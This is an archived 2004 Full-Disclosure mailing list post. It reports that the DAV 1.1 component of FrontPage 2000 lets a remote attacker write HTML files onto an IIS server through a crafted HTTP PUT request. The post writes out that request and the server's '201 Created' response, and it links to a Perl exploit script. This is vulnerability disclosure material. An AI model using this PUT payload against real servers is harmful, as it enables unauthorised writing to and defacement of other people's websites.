Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-Disclosure] Microsoft Data Access Dav1.1 PoC

from [CorryL] Network Security [Permanent Link]
Subject: [Full-Disclosure] Microsoft Data Access Dav1.1 PoC
Date: Fri, 31 Dec 2004 08:53:24 +0100 
Microsoft DATA Access Internet Publishing Service Provider DAV 1.1 component
of frontpage2000 is vulnerable to a special request of PUT a remote attacker
using this bug succeeds to write some
code html to the inside of the server victim

Proof Of Concept:
The remote attacker using the special request of PUT
write the html page in the Victim Server.

PUT /file.htm HTTP/1.0 Accept-Language: en-us;q=0.5 Translate: f
Content-Length:17 User-Agent: Microsoft Data Access Internet Publishing
Provider DAV 1.1 Host: www.hotst-victim.com Html Code

Response to the Server:

HTTP/1.1 201 Created
Server: Microsoft-IIS/5.0
Date: Thu, 30 Dec 2004 22:29:36 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Location: http://192.168.0.3/vulne.htm
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND,
PROPPATCH,
SEARCH, LOCK, UNLOCK

The exploit download from http://hosting.xoned.org/upload/DAV1.1-PoC.pl

Happy New Year By x0n3-h4ck

For info:
CorryL
corryl80@gmail.com
www.x0n3-h4ck.tk Italian Security Team

_________________________________
www.seekstat.it is your web stat
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-Disclosure] Microsoft Data Access Dav1.1 PoC, CorryL <=
Previous by Date:  Re: [Full-Disclosure] MySQL and the user "su", Kristian Koehntopp
Next by Date:  [Full-Disclosure] Re: Document, Scrotora
Previous by Thread:  Re: [Full-Disclosure] Multiple Backdoors found in eEye Products (IRIS and SecureIIS), Daniel H. Renner
Next by Thread:  [Full-Disclosure] Re: Document, Scrotora
Indexes:  [Date] [Thread] [Top] [All Lists]